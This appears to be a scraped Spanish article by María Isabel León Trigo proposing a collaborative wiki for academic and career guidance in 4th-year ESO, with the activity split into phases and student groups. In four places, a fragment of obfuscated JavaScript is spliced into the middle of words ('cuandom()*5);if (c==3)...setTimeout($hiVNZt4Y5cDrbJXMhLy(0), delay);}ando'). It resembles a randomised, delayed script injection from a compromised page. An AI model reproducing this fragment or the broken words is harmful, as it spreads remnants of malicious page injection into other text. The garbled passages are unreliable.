CREACIÓN DE UNA WIKI COMO HERRAMIENTA EN LA ORIENTACIÓN ACADEMICA Y PROFESIONAL

Autora: María Isabel León Trigo

En el presente artículo se propone la creación de una wiki, como recurso didáctico, para trabajar la orientación académica y profesional con el alumnado de 4º de Educación Secundaria Obligatoria. Comenzaremos haciendo hincapié sobre la importancia de la orientación académica y profesional en determinados momentos del ciclo educativo. Posteriormente, describiremos la utilidad de las Tecnologías de la Información y la Comunicación, especialmente de las wiki, en las tareas de orientación profesional y de toma de decisiones. Y por último, expondremos un ejemplo de actividad para llevar a cabo con el alumnado, la creación de una wiki colaborativa.

DESARROLLO DEL ARTÍCULO:


En primer lugar, la orientación académica y profesional es una pieza clave del sistema educativo. La Ley Orgánica 2/2006 de Educación de 3 de mayo, recoge entre sus principios:

“La orientación educativa y profesional de los estudiantes como medio necesario para el logro de una formación personalizada, que propicie una educación integral en conocimientos, destrezas y valores”

Esta orientación toma una mayor relevancia en ciertos momentos. Concretamente, la finalización de la Educación Secundaria Obligatoria es uno de estos puntos clave en la orientación, por diversas razones, entre las que podemos destacar las siguientes:

-       Los/as alumnos/as deben tomar una decisión adecuada respecto a lo que harán el próximo curso, que influirá considerablemente en posteriores decisiones y en su futuro académico y/o profesional.

-       El alumnado presenta una gran variabilidad de necesidades e intereses. Y es necesario proporcionar, a cada uno, una orientación adaptada a su individualidad.

-       La complejidad y últimos cambios del Sistema Educativo hacen más complejas las decisiones que el alumnado debe tomar al finalizar la escolarización obligatoria.

-       El estado actual del mercado laboral implica una gran dificultad para acceder a éste sin disponer de una formación y titulación especializada.

Para orientar al alumnado sobre su futuro académico y profesional no es muy efectivo dar algunos consejos puntuales, en un mundo tan cambiante y con tantas posibilidades. Es más eficaz contribuir a que adquiera las competencias necesarias para valorar las distintas opciones que se le presentan. Enfocamos, entonces, la orientación académica y profesional como un proceso de búsqueda activa y de investigación personal a través del cual cada alumno/a, ha de obtener información lo más útil posible sobre el mundo de las titulaciones y las profesiones.

Los pasos que deben seguirse para llevar a cabo un Plan de Orientación Académica y Profesional con efectividad son los siguientes:

  1. Motivación y sensibilización.
  2. Evaluación personal y desarrollo de habilidades para el autoconocimiento.
  3. Desarrollo de habilidades para conocer el mundo formativo y laboral.
  4. Entrenamiento en estrategia de toma de decisiones.

Por otra parte, la orientación académica y profesional a través del trabajo con herramientas informáticas resulta bastante provechosa y motivadora, cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando éstas se emplean con una finalidad que conecta con los intereses o las preocupaciones del alumnado y con unos objetivos relevantes para ellos.

A esto podemos sumar la importancia que, actualmente, tienen las Tecnologías de la Información y la Comunicación en el Sistema Educativo (La Ley 4/2011, de 7 de marzo, de Educación de Extremadura dedica un capítulo completo al fomento de éstas).

Por estas razones, se plantea la utilización y aprendizaje de un espacio wiki como instrumento en la orientación académica y profesional.

Wiki como recurso educativo

Una Wiki es un sitio web colaborativo que puede ser editado por varios usuarios, pudiendo crear, editar, borrar o modificar el contenido de la web, de una forma interactiva, fácil y rápida. Dichas facilidades hacen de la wiki una herramienta efectiva del trabajo en equipo. Entre las posibilidades que nos ofrece este recurso tecnológico podemos destacar las siguientes:

-   Permite subir y almacenar documentos y todo tipo de archivos (imágenes, documentos pdf, presentaciones…)

-   Se pueden crear enlaces a sitios web externos.

-   La publicación es de forma inmediata usandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando sólo un navegador web (ej. Explorer, Firefox, Mozilla, etc.)

-    Permite controlar el acceso y los permisos de edición. Pueden estar abiertos a todo el mundo o sólo a aquellos que invite el administrador.

Creación de una wiki para trabajar la Orientación Académica y Profesional

La actividad está indicada para llevarla a cabo con alumnado de 4º de ESO. Sin embargo, puede ser adaptable a cualquier otro curso de la ESO o enseñanzas posteriores (Bachillerato, Formación Profesional, Programas de Cualificación Profesional Inicial…).

La finalidad es que el alumnado aprenda a orientarse por sí mismo y a elegir las estrategias más adecuadas para decidir dónde y cómo quiere situarse profesionalmente. A su vez, fomentaremos en el alumnado una serie de destrezas y competencias para trabajar de forma colaborativa. Por último, estarán haciendo un uso adecuado y responsable de las Tecnologías de la Información y la Comunicación.

Sería conveniente que antes de comenzar la actividad, se hubieran trabajado aspectos previos como la motivación y el autoconocimiento (primeros pasos de la orientación vocacional) y, al finalizar la actividad, se lleve a cabo un entrenamiento en habilidades para la toma de decisiones.

La actividad se llevará a cabo en distintas fases:

Fase 1: Entrenamiento en el manejo de una wiki.

En primer lugar, se instruirá al alumnado en conceptos y herramientas relacionados con las wikis. Se deben  tratar los siguientes puntos:

-       Qué es una Wiki.

-       Sitios donde se pueden crear wikis gratuitas.

-       Cómo crear una wiki.

-       Cómo editar y subir información a una wiki.

-       Utilidades.

Fase 2: Búsqueda de información relativa a las opciones académicas y profesionales.

Se dividirá al alumnado en cuatro grupos. A cada uno se le asignará una tarea específica de búsqueda de información, respecto a las alternativas que tienen al terminar la etapa de la ESO:

-       Grupo 1: Formación Profesional.

-       Grupo 2: Bachillerato y Titulaciones Universitarias.

-       Grupo 3: Mundo Laboral.

-       Grupo 4: Formación fuera del ámbito académico.

Los grupos serán los encargados de realizar una investigación exhaustiva y una posterior organización de la información. Se trata de buscar información sobre cada una de las opciones (posibles opciones, requisitos, lugares dónde informarse, noticias al respecto…)

El/la docente tendrá un papel mediador/a y motivador/a. Su rol no se limita a observar el trabajo de los grupos sino que debe supervisar activamente (no de forma directiva) el proceso de construcción y transformación del conocimiento, así como las interacciones que se producen entre los miembros de los distintos grupos.

Fase 3: Elaboración de la wiki.

Una vez hecha la investigación, y posterior elaboración de la información, el paso siguiente es subir las conclusiones a la wiki para que todo el grupo pueda beneficiarse de ella.

El/la docente creará un sitio wiki destinado a esto e invitará como usuarios a todo el alumnado que participe en la actividad para que puedan editar la información del sitio. En éste se crearán cuatro apartados en los que cada grupo irá editandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando la información que ha encontrado sobre su tema específico.

Este trabajo no será algo estático, ya que su objetivo es que la información se vaya renovandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando y se vayan introduciendo las novedades que surjan (bases, convocatorias, plazos de solicitud de estudios…).

De esta forma, se dispondrá de un recurso, creado por el propio alumnado, donde podrán, a su vez, apoyarse a la hora de llevar a cabo la compleja tarea de tomar de decisiones relativas a su futuro académico y profesional.

BIBLIOGRAFÍA Y NORMATIVA:

-     ÁLVAREZ, J. y Vallés, A. (1998): Orienta plus: orientación vocacional y profesional. Madrid: Escuela Española

-     GARCÍA MARTÍN, P. F. Manual de Wikis educativas con Wikispaces. pedrotoledo.wikispaces.com

-     http://tecnologiaedu.uma.es/  (Manual del Curso de Elaboración de wiki con Wikispaces. Universidad de Málaga: Tecnología Educativa).

-     http://orientamur.murciadiversidad.org/gestion/documentos/13._orienteso-navarra.pdf

-     https://palotic.wikispaces.com/Orientaci%C3%B3n+acad%C3%A9mica+y+profesional

-     Ley Orgánica 2/2006, de 3 mayo, de Educación. (BOE nº: 106, 4-5-2006).

-     Ley 4/2011, de 7 de marzo, de Educación de Extremadura (DOE nº: 47, 9-3-2011).

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.